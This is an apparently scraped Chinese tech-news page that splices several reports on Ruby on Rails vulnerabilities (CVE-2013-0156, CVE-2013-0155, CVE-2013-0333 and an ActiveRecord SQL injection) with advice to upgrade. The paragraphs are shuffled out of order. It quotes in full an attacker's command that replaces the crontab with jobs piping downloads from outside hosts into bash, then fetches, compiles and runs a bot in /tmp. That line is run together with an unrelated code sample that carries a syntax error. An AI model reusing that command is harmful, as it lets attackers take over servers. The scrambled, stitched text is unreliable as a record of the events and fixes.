流入漏洞,再爆严重安全漏洞
分类:前端技术

Ruby on Rails近日被发现了两个新的安全漏洞。1. CVE-2013-0156该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。受影响版本:所有版本修复版本:3.2.11、3.1.10、3.0.19、2.3.152. CVE-2013-0155当Active Record与JSON参数解析结合使用时,会存在安全风险。受影响版本:3.x分支修复版本:3.2.11、3.1.10和3.0.19建议受影响版本的用户尽快升级。本月初,Ruby on Rails也曾爆出一个SQL注入漏洞,见:《Ruby on Rails爆SQL注入漏洞,影响所有版本》

图片 1

图片 2

安全专家Jarmoc在博客中称,过去几天,一些基于Rails的Web应用程序和服务器遭到了攻击,攻击者成功入侵后,会在服务器上安装一个机器人,以接受来自IRC频道的进一步指示。攻击者利用的是CVE-2013-0156这个安全漏洞,尽管Rails团队已经在今年1月份修复了该漏洞,但目前还有大量的服务器未更新至最新的版本,使得攻击者有机可乘。该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。新的Rails版本中已经修复了该漏洞。攻击者试图在crontab中添加如下命令:

Ruby on Rails框架开发团队本周一发布了3.0.20和2.3.16两个版本,主要修复了一个关键的远程代码执行漏洞。这是本月内Rails的第3次安全升级,Rails开发团队在博客中称该安全漏洞“极度危急”,建议3.0.x和2.3.x分支上的所有用户立即更新。较新的3.1.x和3.2.x中分支不受此漏洞的影响。根据相应的安全通告显示,新版本修复了Rails JSON代码中的一个漏洞,该漏洞允许攻击者绕过身份验证系统,在应用程序的数据库中注入任意SQL代码,并允许在应用程序中注入恶意代码并发起DoS攻击。Rails开发团队指出,尽管此次针对Rails 3.0.x分支发布了更新,但要注意,官方已经停止了针对该分支的支持。目前官方维护支持的分支只有2.3.x、3.1.x和3.2.x三个。建议不受支持的分支用户尽快升级至这些版本。需要注意的是,此次修复的漏洞标识为CVE-2013-0333,不同于1月10日修复的CVE-2013-0156漏洞,两个修补程序都需要安装。相关阅读:Ruby on Rails爆SQL注入漏洞,影响所有版本Ruby on Rails 再爆严重安全漏洞Via rubyonrails

Ruby on Rails近日爆出了一个关键的漏洞,该漏洞允许攻击者在数据库服务器上执行SQL命令,比如,攻击者可以发起SQL注入攻击来读取未经授权的机密信息。目前该漏洞已修复,可通过文章最后的链接下载修复版本。这是由于ActiveRecord处理嵌套查询参数的方式所致,攻击者可以使用特定的请求,向应用程序的SQL查询中注入某些形式的SQL语句。比如,受影响的代码可以直接传递请求参数到ActiveRecord类中的where方法,如下:

crontab -r; echo "1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;"|crontab -;wget  -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod  x /tmp/k; /tmp/k||wget  -O /tmp/k  chmod  x /tmp/k  /tmp/k
 Post.where(:id = params[:id]).all 

该命令执行后会下载名为cmd1、cmd2和cmd3的可执行文件,并下载一个名为k.c的C源码文件到/tmp目录中,使用系统的GCC编译执行。或许是为了防止编译失败,该条命令还将下载一个预编译的k版本。Jarmoc在博客中公布了k.c的源码,感兴趣的开发者可点击这里。目前最新的Rails版本为3.2.13、3.1.12和2.3.18,建议开发者尽快升级。Via jarmoc

攻击者可以发起一个请求,导致params[:id]返回一个特定的哈希值,从而使WHERE从句可以查询任意数据表。受影响的版本:3.0.0及之后的所有版本未受影响的版本:2.3.14修复版本下载:Rails 3.2.5Rails 3.1.5Rails 3.0.13

本文由澳门新葡8455手机版发布于前端技术,转载请注明出处:流入漏洞,再爆严重安全漏洞

上一篇:大数额分析和CloudStack,那么未来是 下一篇:没有了
猜你喜欢
热门排行
精彩图文
  • iOS开发者终于可以回复用户在App,Play收入疯长
    iOS开发者终于可以回复用户在App,Play收入疯长
    在大家印象中iOS客商的购买技术根本都比Android顾客要强。在各样总计数据中也真正面与反面映了这几个场景。然而只要您够细致你会发觉谷歌Play杂货店收
  • 拾七个你或然不知晓的JavaScript调节和测量检验本
    拾七个你或然不知晓的JavaScript调节和测量检验本
    14 个你可能不知道的 JavaScript 调试技巧 2017/11/17 · JavaScript· 1 评论 ·调试 原文出处:Raygun   译文出处:oschina    了解你的工具可以极大的帮助你完成任
  • 浏览器缓存调控,缓存机制黄金时代二三
    浏览器缓存调控,缓存机制黄金时代二三
    HTTP 缓存机制一二三 2017/10/18 · HTML5 · 4评论 ·缓存 原文出处: 阿咩    Web缓存大致可以分为:数据库缓存、服务器端缓存(代理服务器缓存、CDN缓存)、
  • 何以要写测验用例,的有的提议
    何以要写测验用例,的有的提议
    在 2017 年学习 React Redux 的一些建议(下篇) 2017/09/11 · JavaScript· React,Redux 原文出处: 郭永峰    在这里说一下前端开发的一个特点是更多的会涉及用户界
  • js从0开始构思表情插件
    js从0开始构思表情插件
    js从0开头考虑表情插件 2016/07/28 · JavaScript· 插件 本文小编: 伯乐在线 -陈被单。未经作者许可,禁绝转发! 应接加入伯乐在线 专辑小编。 前言: 是因为